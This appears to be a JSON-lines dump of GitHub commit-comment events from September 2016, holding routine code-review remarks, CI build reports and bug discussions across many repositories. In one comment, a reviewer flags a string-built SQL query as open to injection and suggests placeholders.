{"id":"4612042973","type":"CommitCommentEvent","actor":{"login":"ochaperdana"},"repo":{"name":"ochaperdana/AdvancedWidget1"},"payload":{"comment":{"id":19156873,"position":null,"line":null,"path":null,"commit_id":"097317fccfa3d73b9ca5de50621c07798b830f65","created_at":"2016-09-24T06:16:01Z","updated_at":"2016-09-24T06:16:01Z","body":"<h1>Link Aplikasi</h1>\r\nhttps://docs.google.com/uc?id=0B09XALl5QufvaU9mOWpHN1p6Nzg"}},"created_at":"2016-09-24T06:16:01Z"}
{"id":"4612048022","type":"CommitCommentEvent","actor":{"login":"mderazon"},"repo":{"name":"urbancups/node-sheets"},"payload":{"comment":{"id":19156890,"position":35,"line":103,"path":"README.md","commit_id":"96498c273ff854f3b282e31051281cb0eb1ef740","created_at":"2016-09-24T06:20:41Z","updated_at":"2016-09-24T06:20:41Z","body":"I think that keeping `values` and `stringValues` in the rows objects is redundant.  The data is extractable from the `rows[i].cols` object and removing  it will make accessing the rows which is what mostly needed most of the time easier:\r\n\r\n``` js\r\nrows[i]['Header 1'].value\r\n```\r\nInstead of the more confusing\r\n``` js\r\nrows[i].cols['Header 1'].value\r\n```"}},"created_at":"2016-09-24T06:20:41Z"}
{"id":"4612048368","type":"CommitCommentEvent","actor":{"login":"karthik-shanmugam"},"repo":{"name":"pioneers/PieCentral"},"payload":{"comment":{"id":19156892,"position":null,"line":null,"path":null,"commit_id":"3f53b917b22bb8e46c60c786048f1852c76b1540","created_at":"2016-09-24T06:20:59Z","updated_at":"2016-09-24T06:20:59Z","body":"Are reset and hello not signals as well?"}},"created_at":"2016-09-24T06:20:59Z"}
{"id":"4612051603","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156897,"position":8,"line":7,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:24:01Z","updated_at":"2016-09-24T06:24:01Z","body":"Ooh, this sounds really exciting!"}},"created_at":"2016-09-24T06:24:01Z"}
{"id":"4612051882","type":"CommitCommentEvent","actor":{"login":"mderazon"},"repo":{"name":"urbancups/node-sheets"},"payload":{"comment":{"id":19156899,"position":31,"line":131,"path":"src/sheets.js","commit_id":"96498c273ff854f3b282e31051281cb0eb1ef740","created_at":"2016-09-24T06:24:21Z","updated_at":"2016-09-24T06:24:21Z","body":"What do you say, if instead of having both `table` and `tables` we just use one function that smartly knows to handle both `range` and `[range1, range2, ...]` inputs ?"}},"created_at":"2016-09-24T06:24:21Z"}
{"id":"4612052400","type":"CommitCommentEvent","actor":{"login":"Nozlaf"},"repo":{"name":"renlok/WeBid"},"payload":{"comment":{"id":19156900,"position":null,"line":null,"path":null,"commit_id":"08d871878f917939ce54cbc763bbe93c6f8eea5d","created_at":"2016-09-24T06:24:55Z","updated_at":"2016-09-24T06:24:55Z","body":"potentially this or previous related commit  has caused issues with creating news items\r\n\r\n`[Sat Sep 24 16:22:54.788076 2016] [:error] [pid 5704] [client 192.168.1.3:53616] PHP Fatal error:  Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (0) at position 0 (0): Unexpected character' in /var/www/html/includes/Date.php:98\\nStack trace:\\n#0 /var/www/html/includes/Date.php(98): DateTime->__construct('0', Object(DateTimeZone))\\n#1 /var/www/html/admin/news.php(56): Date->formatDate('0')\\n#2 {main}\\n  thrown in /var/www/html/includes/Date.php on line 98, referer: http://192.168.1.201/admin/spam.php\r\n`\r\n"}},"created_at":"2016-09-24T06:24:55Z"}
{"id":"4612054265","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19156903,"position":13,"line":20,"path":"lib/node_modules/@stdlib/datasets/us-states-abbr/README.md","commit_id":"8640bf4bc4342dfb1dfc5d9080720e5c323f23e2","created_at":"2016-09-24T06:26:42Z","updated_at":"2016-09-24T06:26:42Z","body":"Personally, when I see `get*`, I think GET, an asynchronous request. I can sympathize with `abbr` not being perceived as a function, but I am also sympathetic to shorter variable names. I am more inclined to stick with `abbr` in order to avoid asynchronous connotations (ditto for retrieve, load, fetch, read, etc)."}},"created_at":"2016-09-24T06:26:42Z"}
{"id":"4612054672","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156904,"position":73,"line":75,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:27:06Z","updated_at":"2016-09-24T06:27:06Z","body":"I'm also curious how this would interact with infinite recursion! This seems like a really cool opportunity, since students would get a chance to see why and how their code fails to terminate without a base case, but I guess it seems like this would require some pretty advanced analytics to be able to behave well even when the program a student wrote is going to cause a stack overflow.  I mention this because these sorts of recursive algorithms without base cases will likely be more common among individuals just learning the concepts of recursion."}},"created_at":"2016-09-24T06:27:06Z"}
{"id":"4612054987","type":"CommitCommentEvent","actor":{"login":"geoffreychiou"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19156905,"position":1,"line":1,"path":"godel_robots/abb/godel_irb2400/godel_irb2400_support/CMakeLists_backup.txt","commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T06:27:22Z","updated_at":"2016-09-24T06:27:22Z","body":"Hello, I deleted this file in a later commit: https://github.com/geoffreychiou/godel/commit/8f31997222d4671d5efa731051a53a645cfab52e\r\n\r\nLooks like I forgot to use 'git rm' to remove the code completely. "}},"created_at":"2016-09-24T06:27:22Z"}
{"id":"4612056934","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"tokio-rs/tokio-core"},"payload":{"comment":{"id":19156915,"position":null,"line":null,"path":null,"commit_id":"5ab323e5c2cb76c49a3ec8b6d5857b03ebdf28be","created_at":"2016-09-24T06:29:19Z","updated_at":"2016-09-24T06:29:19Z","body":"@dwrensha Thank you very much!"}},"created_at":"2016-09-24T06:29:19Z"}
{"id":"4612057556","type":"CommitCommentEvent","actor":{"login":"yizow"},"repo":{"name":"pioneers/PieCentral"},"payload":{"comment":{"id":19156918,"position":null,"line":null,"path":null,"commit_id":"3f53b917b22bb8e46c60c786048f1852c76b1540","created_at":"2016-09-24T06:29:57Z","updated_at":"2016-09-24T06:29:57Z","body":"Reset is a command. \r\nHello will be removed, it was when i first started playing around with it. "}},"created_at":"2016-09-24T06:29:57Z"}
{"id":"4612057618","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156919,"position":46,"line":44,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:30:00Z","updated_at":"2016-09-24T06:30:00Z","body":"This definitely answers the question of what we will do in the face of errors, but I'm still very interested in the answer to the \"what happens when a program runs?\" question.  What might we have in mind for the visualization? Would this be some sort of geometric colored blocks perhaps? Maybe the size or color could correspond to problem size?  A 3D animation could be really cool, but perhaps a good first step would just be like nested 2D rectangles, perhaps reminiscent of call graphs?  In any case, a super exciting idea!"}},"created_at":"2016-09-24T06:30:00Z"}
{"id":"4612058240","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156922,"position":52,"line":50,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:30:31Z","updated_at":"2016-09-24T06:30:31Z","body":"I hope it's possible to write a recursive function in this language, if only for the delightful recursion that would result! :)"}},"created_at":"2016-09-24T06:30:31Z"}
{"id":"4612059002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156924,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T06:31:15Z","updated_at":"2016-09-24T06:31:15Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-24T06:31:15Z"}
{"id":"4612061293","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156926,"position":60,"line":58,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:33:22Z","updated_at":"2016-09-24T06:33:22Z","body":"Hmm, I was really excited by this, but I wasn't actually able to get it to work.  I'm not sure if my browser was having trouble rendering or if I was just missing a big obvious \"play\" button, haha.  In any case, it seemed like a cool site and it seems like your idea is super cool!"}},"created_at":"2016-09-24T06:33:22Z"}
{"id":"4612061296","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19156927,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-24T06:33:22Z","updated_at":"2016-09-24T06:33:22Z","body":"Is it possible or a need for the keying nodes to have their own noise/grain reduction implemented in them instead of having to use a separate node?"}},"created_at":"2016-09-24T06:33:22Z"}
{"id":"4612063473","type":"CommitCommentEvent","actor":{"login":"raveit65"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19156930,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-24T06:35:25Z","updated_at":"2016-09-24T06:35:25Z","body":"I was able to build m-a-1.16.0 against kernel-4.8.0-0.rc6.git0.1.fc25 in f25 with -with-cpufreq-lib=cpupower, see logs\r\nhttp://koji.fedoraproject.org/koji/buildinfo?buildID=803464\r\nhttps://kojipkgs.fedoraproject.org//packages/mate-applets/1.16.0/1.fc25/data/logs/x86_64/root.log"}},"created_at":"2016-09-24T06:35:25Z"}
{"id":"4612063950","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156931,"position":68,"line":71,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:35:43Z","updated_at":"2016-09-24T06:35:43Z","body":"Hmm, I suppose this is the main drawback of the idea, it really seems to be more of an app / program rather than a language, at least to the extent that language *design* is involved; as you pointed out, there wouldn't necessarily be that many language design decisions, seeing as the user would be writing in a programming language, so keeping it reasonably similar to a programming language that already exists would probably be a benefit for the users, but that means that most of the time you would spend would likely be in implementing the parsing and visualization."}},"created_at":"2016-09-24T06:35:43Z"}
{"id":"4612065824","type":"CommitCommentEvent","actor":{"login":"tijko"},"repo":{"name":"tijko/bluebird"},"payload":{"comment":{"id":19156936,"position":17,"line":747,"path":"bluebird/bluebird.c","commit_id":"f9cff88360a6474c1e029bf9596c8ee9867cde62","created_at":"2016-09-24T06:37:18Z","updated_at":"2016-09-24T06:37:18Z","body":"Call `readstring` to for the path here, instead of in the `Bluebird` object"}},"created_at":"2016-09-24T06:37:18Z"}
{"id":"4612065900","type":"CommitCommentEvent","actor":{"login":"MichaelSheely"},"repo":{"name":"hmc-cs111-fall2016/project-ideas"},"payload":{"comment":{"id":19156938,"position":36,"line":34,"path":"free-3.md","commit_id":"9bee19c2ed9b6b8ae848aa42bf6df5f2d874ac6c","created_at":"2016-09-24T06:37:23Z","updated_at":"2016-09-24T06:37:23Z","body":"In what ways would your DSL differ from the [visualizer](http://visualgo.net/recursion) you mention in the *Related Work* section?"}},"created_at":"2016-09-24T06:37:23Z"}
{"id":"4612066237","type":"CommitCommentEvent","actor":{"login":"Benbauman96"},"repo":{"name":"koush/Superuser"},"payload":{"comment":{"id":19156939,"position":9,"line":0,"path":"LICENSE","commit_id":"91799b472fbb28aeae39d3ed4852c6409c196548","created_at":"2016-09-24T06:37:43Z","updated_at":"2016-09-24T06:37:43Z","body":"Ben\n"}},"created_at":"2016-09-24T06:37:43Z"}
{"id":"4612066648","type":"CommitCommentEvent","actor":{"login":"tijko"},"repo":{"name":"tijko/bluebird"},"payload":{"comment":{"id":19156942,"position":35,"line":127,"path":"Bluebird.py","commit_id":"b44d963dd162924c6bb74c67e27c31934e71046c","created_at":"2016-09-24T06:38:07Z","updated_at":"2016-09-24T06:38:07Z","body":"This will find the executables path so long as the traced process hasn't changed directories."}},"created_at":"2016-09-24T06:38:07Z"}
{"id":"4612069219","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19156945,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-24T06:40:24Z","updated_at":"2016-09-24T06:40:24Z","body":"Really helpful to me. thanks a lot.\n\n    On Saturday, 24 September 2016 11:13 AM, varun-k2 <notifications@github.com> wrote:\n \n\n Hi @aslam558 ,\nLook for the below which decide the triggering event of plugin.\nvalidationEventTrigger: \"blur\",\nHere you have to add events like keyup keydown wherever you want plugin to validate the form.\nyou can also add this while initializing/attaching the plugin to form.—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.  \n\n   "}},"created_at":"2016-09-24T06:40:24Z"}
{"id":"4612070919","type":"CommitCommentEvent","actor":{"login":"geoffreychiou"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19156950,"position":35,"line":89,"path":"godel_plugins/CMakeLists.txt","commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T06:41:52Z","updated_at":"2016-09-24T06:41:52Z","body":"The Qt documentation said: \"Imported targets are created for each Qt module. Imported target names should be preferred instead of using a variable like Qt5<Module>_LIBRARIES in CMake commands such as target_link_libraries. \"\r\nI understood that as using the name instead of the variable. I may be wrong and can add them as variables if that is the way we do it.\r\nSource: http://doc.qt.io/qt-5/cmake-manual.html"}},"created_at":"2016-09-24T06:41:52Z"}
{"id":"4612072643","type":"CommitCommentEvent","actor":{"login":"geoffreychiou"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19156951,"position":35,"line":89,"path":"godel_plugins/CMakeLists.txt","commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-24T06:43:26Z","updated_at":"2016-09-24T06:43:26Z","body":"As for the other changes, I followed this Stack Overflow post.\r\n\r\nhttp://stackoverflow.com/questions/28252909/cmake-and-qt5-include-only-takes-one-argument"}},"created_at":"2016-09-24T06:43:26Z"}
{"id":"4612072791","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19156952,"position":null,"line":null,"path":null,"commit_id":"0d3f1657c020f80442b0822c313616b9c6d25e09","created_at":"2016-09-24T06:43:35Z","updated_at":"2016-09-24T06:43:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QDrNS7mxQgGGjgxKwMaRiA"}},"created_at":"2016-09-24T06:43:35Z"}
{"id":"4612073674","type":"CommitCommentEvent","actor":{"login":"sergekri"},"repo":{"name":"sergekri/mp2-lab1-set"},"payload":{"comment":{"id":19156954,"position":8,"line":16,"path":"src/tbitfield.cpp","commit_id":"e8e53dc0c770ade02e6b6d1e3f1ac4d4ba0e28a8","created_at":"2016-09-24T06:44:26Z","updated_at":"2016-09-24T06:44:26Z","body":"Исправил знак"}},"created_at":"2016-09-24T06:44:26Z"}
{"id":"4612077902","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"mochidev/MDAboutController"},"payload":{"comment":{"id":19156960,"position":3,"line":282,"path":"Classes/MDAboutController.m","commit_id":"9373b97425bfcc2a5878918757a1a53ca61f1c62","created_at":"2016-09-24T06:48:29Z","updated_at":"2016-09-24T06:48:29Z","body":"circularZoneChanged"}},"created_at":"2016-09-24T06:48:29Z"}
{"id":"4612079116","type":"CommitCommentEvent","actor":{"login":"ghsr"},"repo":{"name":"daneal2u/android_device_samsung_i9082"},"payload":{"comment":{"id":19156963,"position":null,"line":null,"path":null,"commit_id":"8bf103746c6c332bce3fdd1e8e98a28727c6a091","created_at":"2016-09-24T06:49:39Z","updated_at":"2016-09-24T06:49:39Z","body":"On our platform with zram PRODUCT_AAPT_CONFIG causes graphical glitches, so just need to revert this commit. I have no other ideas of how to fix it.\r\nHere fix the build error: https://github.com/ghsr/build_tools/blob/cm-13.0/patches/vendor_cm.patch"}},"created_at":"2016-09-24T06:49:39Z"}
{"id":"4612079129","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19156964,"position":null,"line":null,"path":null,"commit_id":"dfd915041a8baa31a9ee65a29ffc2c5ab8e41db1","created_at":"2016-09-24T06:49:40Z","updated_at":"2016-09-24T06:49:40Z","body":"-,- player's inventory hasn't 45 slots......"}},"created_at":"2016-09-24T06:49:40Z"}
{"id":"4612079809","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19156965,"position":null,"line":null,"path":null,"commit_id":"dfd915041a8baa31a9ee65a29ffc2c5ab8e41db1","created_at":"2016-09-24T06:50:12Z","updated_at":"2016-09-24T06:50:12Z","body":"did you forget 9 additional slots representing hotbar?"}},"created_at":"2016-09-24T06:50:12Z"}
{"id":"4612080076","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19156966,"position":null,"line":null,"path":null,"commit_id":"0d3f1657c020f80442b0822c313616b9c6d25e09","created_at":"2016-09-24T06:50:30Z","updated_at":"2016-09-24T06:50:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#C1MPJsDRSCelKzBOcYkFvg"}},"created_at":"2016-09-24T06:50:30Z"}
{"id":"4612080419","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19156969,"position":44,"line":236,"path":"mandelbulber2/src/command_line_interface.cpp","commit_id":"0c921cc79d8e751ccb07b47dd35fe53a14cae291","created_at":"2016-09-24T06:50:47Z","updated_at":"2016-09-24T06:50:47Z","body":"**L**inux **I**s **N**ot an **U**ni**X** :penguin: "}},"created_at":"2016-09-24T06:50:47Z"}
{"id":"4612083628","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19156974,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-24T06:53:40Z","updated_at":"2016-09-24T06:53:40Z","body":"Do we have the stuff documented? Also are the CAL modules ready to be merged? It would be good to have a more stable base to start with optimizing the profiles and removing possible conflicts if needed. It should be a team effort on this. However everybody should know how the system should work by then. Otherwise everybody works on some ideas and nobody on the same project. This would be then a waste of time."}},"created_at":"2016-09-24T06:53:40Z"}
{"id":"4612084571","type":"CommitCommentEvent","actor":{"login":"fanisrafailovich"},"repo":{"name":"fanisrafailovich/html-css"},"payload":{"comment":{"id":19156976,"position":6,"line":16,"path":"project-1/index.html","commit_id":"82cd645d75646592a54ff59e68aa6c50781051ee","created_at":"2016-09-24T06:54:27Z","updated_at":"2016-09-24T06:54:27Z","body":"что это и зачем?"}},"created_at":"2016-09-24T06:54:27Z"}
{"id":"4612084950","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19156978,"position":21,"line":21,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T06:54:47Z","updated_at":"2016-09-24T06:54:47Z","body":"ありがとうございます！\r\n実はこちらの書き方、\r\n\r\n$sql = \"UPDATE topics SET name='nameafter' WHERE id='$id'\"; \r\n\r\nだとSQLインジェクション対策ができていないのです。\r\n\r\n「php pdo プレースホルダ」で検索して、簡単な記事を探してみましょう。"}},"created_at":"2016-09-24T06:54:47Z"}
{"id":"4612087305","type":"CommitCommentEvent","actor":{"login":"openhardwarecoza"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19156980,"position":null,"line":null,"path":null,"commit_id":"2d075602a6dd21ba779f611ebde3788b843b8bed","created_at":"2016-09-24T06:57:02Z","updated_at":"2016-09-24T06:57:02Z","body":"I am busy cleaning it up even more, and Bootstrapping the UI:\r\n\r\nWhat exactly is \"cut type\"? "}},"created_at":"2016-09-24T06:57:02Z"}
{"id":"4612088277","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19156986,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-24T06:57:52Z","updated_at":"2016-09-24T06:57:52Z","body":"ImageStatistics node doesn't seem to change a read node once the scan button is pressed and copied to another read node. What am I doing wrong."}},"created_at":"2016-09-24T06:57:52Z"}
{"id":"4612088572","type":"CommitCommentEvent","actor":{"login":"Toxicable"},"repo":{"name":"Toxicable/PassPast"},"payload":{"comment":{"id":19156987,"position":null,"line":null,"path":null,"commit_id":"03a31d92e7ef05d2ac7cc345f77bbf68f9e6050d","created_at":"2016-09-24T06:58:10Z","updated_at":"2016-09-24T06:58:10Z","body":"#32 "}},"created_at":"2016-09-24T06:58:10Z"}
{"id":"4612089164","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19156988,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-24T06:58:45Z","updated_at":"2016-09-24T06:58:45Z","body":"But it is not working for Drop-downs.Kindly suggest.. \n\n    On Saturday, 24 September 2016 12:10 PM, Mohamed Aslam <aslam_3339@yahoo.com> wrote:\n \n\n Really helpful to me. thanks a lot.\n\n    On Saturday, 24 September 2016 11:13 AM, varun-k2 <notifications@github.com> wrote:\n \n\n Hi @aslam558 ,\nLook for the below which decide the triggering event of plugin.\nvalidationEventTrigger: \"blur\",\nHere you have to add events like keyup keydown wherever you want plugin to validate the form.\nyou can also add this while initializing/attaching the plugin to form.—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.  \n\n   \n\n   "}},"created_at":"2016-09-24T06:58:45Z"}
{"id":"4612089464","type":"CommitCommentEvent","actor":{"login":"Millyy"},"repo":{"name":"Toxicable/PassPast"},"payload":{"comment":{"id":19156989,"position":null,"line":null,"path":null,"commit_id":"03a31d92e7ef05d2ac7cc345f77bbf68f9e6050d","created_at":"2016-09-24T06:59:02Z","updated_at":"2016-09-24T06:59:02Z","body":"no i got this\r\n\r\nhttps://github.com/Toxicable/PassPast/issues/32"}},"created_at":"2016-09-24T06:59:02Z"}
{"id":"4612090573","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156992,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T07:00:04Z","updated_at":"2016-09-24T07:00:04Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2379 of 2379 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T07:00:04Z"}
{"id":"4612090602","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19156993,"position":null,"line":null,"path":null,"commit_id":"0cc3b6108ef7be42175c9c2544629fc928b3bdac","created_at":"2016-09-24T07:00:05Z","updated_at":"2016-09-24T07:00:05Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2313 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.67%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T07:00:05Z"}
{"id":"4612091696","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19157010,"position":null,"line":null,"path":null,"commit_id":"dfd915041a8baa31a9ee65a29ffc2c5ab8e41db1","created_at":"2016-09-24T07:00:52Z","updated_at":"2016-09-24T07:00:52Z","body":"ok we can try to remove these additional slots"}},"created_at":"2016-09-24T07:00:52Z"}
{"id":"4612092332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19157011,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T07:01:18Z","updated_at":"2016-09-24T07:01:18Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T07:01:18Z"}
{"id":"4612097025","type":"CommitCommentEvent","actor":{"login":"bergholdt"},"repo":{"name":"metricfu/metric_fu"},"payload":{"comment":{"id":19157018,"position":5,"line":4,"path":"Gemfile","commit_id":"68aa5db8ba549ab9af6c3bee45e817ca028280a4","created_at":"2016-09-24T07:05:18Z","updated_at":"2016-09-24T07:05:18Z","body":"I agree on not doing the hack on latest.\r\n\r\nbundle exec spec works for all ruby,  but local_development miss rubocop on latest.\r\n\r\nI have a branch where \r\n- run rake\r\n- run metric_fu on it self\r\n- run rubocop\r\nThis currently fails on all versions :-( \r\nhttps://travis-ci.org/bergholdt/metric_fu"}},"created_at":"2016-09-24T07:05:18Z"}
{"id":"4612099086","type":"CommitCommentEvent","actor":{"login":"xuwei-k"},"repo":{"name":"yoshiyoshifujii/sbt-aws-serverless.g8"},"payload":{"comment":{"id":19157032,"position":1,"line":1,"path":"src/main/g8/LICENSE","commit_id":"7590e35a174eea7db18bf045b69e2955f218d988","created_at":"2016-09-24T07:07:06Z","updated_at":"2016-09-24T07:07:06Z","body":"typesafe?"}},"created_at":"2016-09-24T07:07:06Z"}
{"id":"4612100392","type":"CommitCommentEvent","actor":{"login":"Rakeshrkr"},"repo":{"name":"Rakeshrkr/Quickart-Backend"},"payload":{"comment":{"id":19157036,"position":null,"line":null,"path":null,"commit_id":"417a6c5220c9f87470a81553dea70157186a2991","created_at":"2016-09-24T07:08:19Z","updated_at":"2016-09-24T07:08:19Z","body":"JUnit Test cases for user , userdetails , category , supplier and product model-daoImp classes. Checking whether particular product is added , edited , deleted and updated or not ."}},"created_at":"2016-09-24T07:08:19Z"}
{"id":"4612104682","type":"CommitCommentEvent","actor":{"login":"terinjokes"},"repo":{"name":"yoshuawuyts/server-router"},"payload":{"comment":{"id":19157046,"position":82,"line":59,"path":"index.js","commit_id":"4484e1a8cd3af805259308ca72f37e6f71366d0a","created_at":"2016-09-24T07:12:16Z","updated_at":"2016-09-24T07:12:16Z","body":"You didn't migrate this functionality, so the `args1` through `args4` you pass through at the bottom of the file get dropped here. This makes `pull-http` sad."}},"created_at":"2016-09-24T07:12:16Z"}
